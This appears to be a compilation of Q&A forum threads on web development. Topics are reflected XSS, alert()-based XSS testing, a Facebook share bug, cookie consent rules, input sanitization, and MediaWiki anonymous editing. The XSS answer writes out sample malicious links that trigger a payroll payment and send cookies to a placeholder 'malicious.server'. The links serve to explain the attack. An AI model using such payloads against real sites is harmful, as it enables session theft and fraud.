I am researching XSS and trying to understand different types of XSS.
Most documents talk about what they are and try to explain with a simple example.I have understood stored XSS quite well.
What I don't understand is reflected XSS and how its done in a real world scenario.Most explanations just talk about injecting malicious code which gets embedded on the page a user visits by clicking a malicious link.But I don't understand how and why they would click such a link in the first place.
If any of you can share a real world example for reflective XSS,it would really be helpful.
"Hi midhun lc,
I created the salary report you asked for, find it [here].
Regards,
Your assistant"
[here] is a link that points to https://payrollapplication/reportid=<script>$.post('https://payrollapplication/send_payment?amount=5000&to=assistant')</script> (Obviously this also exploits CSRF.)
Or [here] is a link that points to https://payrollapplication/reportid=<script>$.post('malicious.server/?receive=' + document.cookie)</script> to steal session and other cookies. (This also exploits weak cookie flags.)
Or it can just send any data from the payrollapplication that the victim can access.
And so on. How exactly the payload gets to the victim may vary of course. It can be in an internal doc, sent in an email, etc.
Related
I was wondering why alert() is quite often used to demonstrate XSS vulnerabilities. If I am not mistaken XSS means that the attacker should be able to establish two-way communication between infected client and attacker's server. It is just that this is a quite visual way to demonstrate that the attack is possible (as it uses the same characters as the actual payload would have) or is there something more? I tried to look it up online but found nothing...
You're overthinking it. it's demonstrated with an alert because when the alert is shown, it means the attacker was able to insert javascript code into your page and that code was executed as if you had put it there yourself. ... so from the perspective of the client (visitor) this code is coming from you, and they don't know anything about the attacker - which is what the attacker wants.
It's just like a "hello world" program but from the XSS world. It's easy to check, minimalistic, checking that you can at least execute some javascript function (alert). While you're looking for an XSS, the payload itself is not as important as the "can I actually inject some javascript here?" question.
Basically, it's a 2 steps approach.
Find a vulnerable parameter. (using alert or any other simple function)
Now let's have some fun with it.
If I am not mistaken XSS means that the attacker should be able to establish two-way communication between infected client and attacker's server.
Not always. Sometimes, 1-way communication is enough:
Just send data to your server, no response required. It's very useful for the stored XSS case (when let's say you can put random javascript code into a comment visible to other users)
You can inject some HTML asking the user to open another website and do whatever you want. (XSS + social engineering)
To summarise: alert is a simple function sufficient to check if you can inject javascript, like "hello world" to check that your setup is working. If you're successful -> it's time to make it more complicated.
Edit: in a real attack, people usually check more options, because the "alert" keyword is blocked by most security filters. It doesn't mean that the XSS is not there ;) But "alert" is a very convenient example for tutorials, so you'll see it everywhere.
I was wondering why alert() is quite often used to demonstrate XSS vulnerabilities.
Simply because the alert() method is the best option to show people that you are able to insert JS code into the page.
If I am not mistaken XSS means that the attacker should be able to establish two-way communication between infected client and attacker's server.
Kinda. XSS just means that the attacker is able to inject malicious JS into the page.
It is just that this is a quite visual way to demonstrate that the attack is possible (as it uses the same characters as the actual payload would have) or is there something more?
It's just the visual way.
However JS can be sandboxed in iframes etc. so the alert('XSS') is not the best method to show that you are able to inject malicious code.
The best way is to use some information from the page itself. For example
alert(`XSS attack on ${window.location.host}'s page: "${document.title}"`)
is a lot better way to demonstrate. It shows that you can have access to window properties (redirect) and document (modify) as well.
On this page it would display:
XSS attack on stackoverflow.com's page: "XSS, why is alert(XSS) used to find/demonstrate xss vulnerabilities? - Stack Overflow"
First post on StackOverflow, so please forgive any protocol lapses!
I've found similar problems to the one below elsewhere on SO, but none that's an exact match, nor a solution that hits the spot.
I have a client site with FB Share and Like buttons, all of which work perfectly on straightforward named pages. In the case of the shop and blog pages I need to use a querystring, which works perfectly on other sites, but not this one! I've run the FB Debugger on the affected pages and all looks hunky dory.
Here are two example pages with the problem:
http://www.fabniki.com/productdetail?pid=251 and http://www.fabniki.com/blogdetail?id=327&p=1.
In the case of the shop item, the text Facebook is showing isn't even on the page. I've tried clearing cache, forcing an FB cache refresh etc.
My own site uses a similar querystring system for my blog, and this works absolutely fine with Facebook shares and likes.
I'd be very grateful for any suggestions!
OK, the problem was - unsurprisingly - entirely of my own making. I'd allowed myself to get bogged down in the debugger, which looks at the exact URL you paste into its input field. If you're sufficiently idiotic, it may not occur to you to check if this is the actual value being passed to FB by your Like and Share buttons. Doh!
Thanks to some excellent support from FB developers, the problem was spotted and corrected with only minor dents to my ego.
I wanted to answer my own question, a) to avoid wasting people's time and b) to give Facebook Support a bit of appreciation for a change!
Struggling to find information on this...
Do you have to have e.g a pop up / information bar that says the cookie message and then has a opt in button. Or can you simply have a link in a footer that says cookie and data information etc.
Some people only do the later and if thats allowed it makes no sense to do anything else...
Implied consent is absolutely fine, unless you're dealing with sensitive data, which means you just have to display information regarding your cookie use but the user doesn't have to actually click on anything to accept it before they can carry on. The UK information commissioners office has some really good information: https://ico.org.uk/for-organisations/guide-to-pecr/cookies. I'm not sure where you're based but the law is Europe wide so the advice would be the same regardless.
The UK government site uses implied consent so if they're doing it you can assume you'll be ok.
As for those sites with explicit consent, I remember when the ruling was first made and there was an assumption that explicit consent was required so it is likely just sites which implemented the rules very early. To be honest, I can't remember visiting any site which required me to agree to cookie use before continuing, buttons are usually just there to get rid of the annoying messages.
Simply having a link in the footer is not sufficient in my opinion, as the ICO says:
This remains the case if information is provided to the user but only as part of a privacy notice that is hard to find, difficult to understand or rarely read
If I have fields that will only ever be displayed to the user that enters them, is there any reason to sanitize them against cross-site scripting?
Edit: So the consensus is clear, that it should be sanitized. What I'm trying to understand is why? If the only user that can ever view the script they insert into the site is the user himself, then the only thing he can do is execute the script himself, which he could already do without my site being involved. What's the threat vector here?
Theoretically: no. If you are sure that only they will ever see this page, then let them script whatever they want.
The problem is that there are a lot of ways in which they can make other people view that page, ways you do not control. They might even open the page on a coworker's computer and have them look at it. It is undeniably an extra attack vector.
Example: a pastebin without persistent storage; you post, you get the result, that's it. A script can be inserted that inconspicuously adds a "donate" button to link to your PayPal account. Put it up on enough people's computer, hope someone donates, ...
I agree that this is not the most shocking and realistic of examples. However, once you have to defend a security-related decision with "that is possible but it does not sound too bad," you know you crossed a certain line.
Otherwise, I do not agree with answers like "never trust user input." That statement is meaningless without context. The point is how to define user input, which was the entire question. Trust how, semantically? Syntactically? To what level; just size? Proper HTML?
Subset of unicode characters? The answer depends on the situation. A bare webserver "does not trust user input" but plenty of sites get hacked today, because the boundaries of "user input" depend on your perspective.
Bottom line: avoid allowing anybody any influence over your product unless it is clear to a sleepy, non-technical consumer what and who.
That rules out almost all JS and HTML from the get-go.
P.S.: In my opinion, the OP deserves credit for asking this question in the first place. "Do not trust your users" is not the golden rule of software development. It is a bad rule of thumb because it is too destructive; it detracts from the subtleties in defining the frontier of acceptable interaction between your product and the outside world. It sounds like the end of a brainstorm, while it should start one.
At its core, software development is about creating a clear interface to and from your application. Everything within that interface is Implementation, everything outside it is Security. Making a program do the things you want it to is so preoccupying one easily forgets about making it not do anything else.
Picture the application you are trying to build as a beautiful picture or photo. With software, you try to approximate that image. You use a spec as a sketch, so already here, the more sloppy your spec, the more blurry your sketch. The outline of your ideal application is razor thin, though! You try to recreate that image with code. Carefully you fill the outline of your sketch. At the core, this is easy. Use wide brushes: blurry sketch or not, this part clearly needs coloring. At the edges, it gets more subtle. This is when you realize your sketch is not perfect. If you go too far, your program starts doing things that you do not want it to, and some of those could be very bad.
When you see a blurry line, you can do two things: look closer at your ideal image and try to refine your sketch, or just stop coloring. If you do the latter, chances are you will not go too far. But you will also make only a rough approximation of your ideal program, at best. And you could still accidentally cross the line anyway! Simply because you are not sure where it is.
You have my blessing in looking closer at that blurry line and trying to redefine it. The closer you get to the edge, the more certain you are where it is, and the less likely you are to cross it.
Anyway, in my opinion, this question was not one of security, but one of design: what are the boundaries of your application, and how does your implementation reflect them?
If "never trust user input" is the answer, your sketch is blurry.
(and if you don't agree: what if OP works for "testxsshere.com"? boom! check-mate.)
(somebody should register testxsshere.com)
Just because you don't display a field to someone, doesn't mean that a potential Black Hat doesn't know that they're there. If you have a potential attack vector in your system, plug the hole. It's going to be really hard to explain to your employer why you didn't if it's ever exploited.
I don't believe this question has been answered entirely. He wants to see an accuall XSS attack if the user can only attack himself. This is actually done by a combination of CSRF and XSS.
With CSRF you can make a user make a request with your payload. So if a user can attack himself using XSS, you can make him attack himself (make him make a request with your XSS).
A quote from The Web Application
Hacker’s Handbook:
COMMON MYTH:
“We’re not worried about that low-risk XSS bug. A user could exploit it only to attack himself.”
Even apparently low-risk vulnerabilities can, under the right circumstances, pave the way for a devastating attack. Taking a defense-in-depth approach to security entails removing every known vulnerability, however insignificant it may seem. The authors have even used XSS to place file browser dialogs or ActiveX controls into the page response, helping to break out of a kiosk-mode system bound to a target web application. Always assume that an attacker will be more imaginative than you in devising ways to exploit minor bugs!
Yes, always sanitize user input:
Never trust user input
It does not take a lot of effort to do so.
The key point being 1.
If the script, or service, that the form submits the values to is available via the internet then anyone, anywhere, can write a script that will submit values to it. So: yes, sanitize all inputs received.
The most basic model of web-security is pretty simple:
Do not trust your users
It's also worth linking to my answer in another post (Steps to become web-security savvy): Steps to become web security savvy.
I can't believe I answered without referring to the title-question:
Is there any reason to sanitize user input to prevent them from cross site scripting themself?
You're not preventing the user's being cross-site scripted, you're protecting your site (or, more importantly, you're client's site) from being the victim of cross-site scripting. If you don't close known security holes because you couldn't be bothered it will become very hard to get repeat business. Or good word-of-mouth advertising and recommendation from previous clients.
Think of it less as protecting your client, think of it -if it helps- as protecting your business.
Problem
At work we have a department wiki (running Mediawiki). Unfortunately several
persons edit without logging in, and that makes it very difficult to track
down editors to ask questions about the content.
There are two strategies to improve this
encourage logged in editing
discourage anonymous editing.
Encouraging
For this part, any tips are welcome. But of course there is always risks involved
in rewarding behaviours.
Discourage
I know that this must be kept low or else it will discourage any editing.
But something just slightly annoying would be nice to have.
[update]
I know it is possible to just disallow anonymous editing, but that will put a high barrier to any first time contribution (especially for people outside our department!), so I do not think that is an option.
[/update]
[update2]
Using LDAP or Active Directory does not solve the problem since the wiki is also accessible and used by external contractors.
[/update2]
[update3]
I am no longer working for this company. That does not mean that I completely have lost interest in this question, but from my current interest point the most valuable part is the "Did you forget to log in?" part below, and I will accept answers based on this part of the question.
[/update3]
Confirmation
One thought was to have an additional confirmation step for anonymous users -
"Are you really sure you want to submit this anonymously?", although with
such a question there is a risk that people will give up or resist editing. However,
if that question is re-phrased in a more diplomatic way as "Did you forget
to log in?" I think it will appear as much more acceptable. And besides that
will also capture those situations where the author did in fact forget to
log in, but actually would want to have his/her contributions credited
his/her user. This last point is by itself a good enough reason for wanting it.
Is this possible?
Delay
Another thought for something to be slightly annoying is to add an extra
forced delay after "save page" displaying something like "If you had logged
in you would not have to wait x seconds". Selecting a right x is difficult
because if it is to high it will be a barrier and if it too low might not
make any difference. But then I started thinking, what about starting at
zero and then add one second delay for each anonymous edit by a given IP
address in a given time frame? That way there will be no barrier for
starting to use the wiki, and by the time the delay is getting significant
the user has already contributed a lot so I think the outcome is much
more likely to be that the editor eventually creates a user rather than
giving up. This assumes IP addresses are rather static, but that is very
typically is the case in a business network.
Is this possible?
You can Turn off Anonymous Editing in Mediawiki like so:
Edit LocalSettings.php and add the following setting:
$wgDisableAnonEdit = true;
Edit includes/SkinTemplate.php, find $fname-edit and change the code to look like this (i.e., basically wrap the following code between the wfProfileIn() and wfProfileOut() functions):
wfProfileIn( "$fname-edit" );
global $wgDisableAnonEdit;
if ( $wgUser->mId || !$wgDisableAnonEdit) {
// Leave this as is
}
wfProfileOut( "$fname-edit" );
Next, you may want to disable the [Edit] links on sections. To do this, open includes/Skin.php and search for editsection. You will see something like:
if (!$wgUser->getOption( 'editsection' ) ) {
Change that to:
global $wgDisableAnonEdit;
if (!$wgUser->getOption( 'editsection' ) || !$wgDisableAnonEdit ) {
Section editing is now blocked for anonymous users.
Forbid anonymous editing and let people log in using their domain logins (LDAP). Often the threshold is the registering of a new user and making up username and password and such.
I think you should discourage anonymous edits by forbidding them - it's an internal wiki, after all.
The flipside is you must make the login process as easy as possible. Hopefully you can configure the login cookie to have a decent length (like 1 month) so they only need to login once per month.
Play to the people's egos, and add a rep system kind of like here. Just make a widget for the home page that shows the number of edits made by the top 5 users or something. Give the top 1 or 2 users a MVP reward at regular (monthly?) intervals.
Well, I doubt that this solution will be valuable for hlovdal, given that this question is now two months old, but maybe somebody else will find it useful:
The optimum solution to this problem is to enable automatic logins. This requires two steps. First, you need to add automatic authentication to your web service. Right now, we're using Apache with the Debian usn-libapache2-authenntlm-perl package on our internal application server*. (Our network is Active Directory and, obviously, the server runs on Debian Linux.) Second, you need a MediaWiki extension that makes MediaWiki aware of the web service's authentication. I've used the Automatic REMOTE_USER Authentication module successfully on an Apache web server that was tied into our network via an NTLM authentication module, but I do recall that it required a bit of massaging the code to make it work:
I had to follow the "horrid hacks" given on the extension's page, changing the setPassword() and addUser() functions to always return true instead of always returning false.
Since Active Directory is case-insensitive and MediaWiki isn't, I replaced both instances of the statement $username = $_SERVER['REMOTE_USER'] with $username = getCanonicalName($_SERVER['REMOTE_USER']).
Since I wanted to only allow certain people within the company to use our wiki, I set autoCreate() to always return false. It doesn't sound as if you need to worry about this, so you should leave autoCreate() at always returning true, which means that anybody on your company network will be able to access the wiki.
The nifty thing about this solution is that nobody has to log in into the wiki, ever; they simply go to a wiki page and they are logged in under their network ID.
* We just switched to this from a Red Hat server that was using mod_ntlm. Unfortunately, mod_ntlm hasn't been updated in a while and it's been starting to sporadically fail. I mention this because I've started to stumble on a performance issue with our current MediaWiki configuration that may require further code massaging....
Make sure users don't get logged out if they look away from the screen or sneeze or scratch their head. You want long, persistent, sessions. Once logged in, stay logged in.
That's the problem with the MediaWiki our company is using internally - you log in, do stuff, then come back later and it logged you out, but the notification of not being logged in anymore is so insignificant on the screen that the user never notices.
If this runs within an internal network, you could pull Active Directory information so that no one has to log in, ever. That's how I do it at work. That is, if they are logged into their windows machine, then my webapps can pick up their username and associate that (or their userid) with their edits.
I don't know if this would be easy to add to MediaWiki, though.
I'd recommend checking out wikipatterns.org - a great site about the social aspects of wikis
Explicitly using some form of directory service (LDAP) would probably be a good idea, so that your users are always fully identified. On the other hand, wikis are subject to their own dynamics, in fact some wikis are so successful because they can be anonymously edited, so that's another thing to keep in mind.
Apart from that, personally I'd try to create some sort of incentive for users to contribute openly and identifiable: this could be based on a point/score system so that there are stats shown for all users who have contributed to the wiki each day, this could possibly even create some sort of competition.
Likewise, the wiki could by default not show any anonymously contributed contents without them being reviewed first, which would be another incentive for users to contribute openly.
SO has an extremely low barrier for posting. You could allow people to specify their name when making an edit. When they are ready, they can finally log in to avoid having to type their name all the time.
You said this is in a departmental situation. Can't you add a feature to the wiki where it makes an educated guess as to who is editing based on the IP address, and annotates the edit accordingly?
I agree absolutely with everyone who recommends carefully researching the effects of anonymity in your application before you start "forbidding" it. In a great many cases people prefer anonymous editing because they DO NOT WANT TO BE ASKED ABOUT IT, IDENTIFIED WITH IT, OR SUFFER SOME PROBLEM FOR POINTING IT OUT. You need to be VERY sure these factors are not driving users to prefer anonymous edits, and frankly you should continue to allow anonymized edits with a generic credential login like "anonymous_employee" or "anonymous_contractor", in case someone wants to point out an issue without becoming identified with it.
Re the "thought... to have an additional confirmation step for anonymous users- "Are you really sure you want to submit this anonymously?", it's a good idea, but do not "re-phrase" in a way that suggests it is wrong to not be logged in as yourself, i.e. don't say "Did you forget to log in?" I'd instead note it this way:
"Your edit will appear as an IP number - it may be attributed to 'anonymous_employee' or 'anonymous_contractor' or 'anonymous_contributor' for your privacy protection. You will not be notified of any answer or response to it. If you prefer to have this contribution credited, then [log in right now]."
That leaves it absolutely clear what will happen, doesn't pressure anyone to do it either way, and does not bias what is being contributed with some "rewards".
You can also, alternately, force a login via LDAP / cookies, and then ask them if they prefer this edit to be anonymous. That is the approach taken on some blog platforms. In an intranet the abuse potential for this is basically zero, so you would presumably only have situations where someone didn't want 'how they knew' or 'why they raised this' to be the question rather than the data itself... IBM has shown in some careful research that anonymized feedback is very much more useful than attributed in correcting groupthink & management blind sides.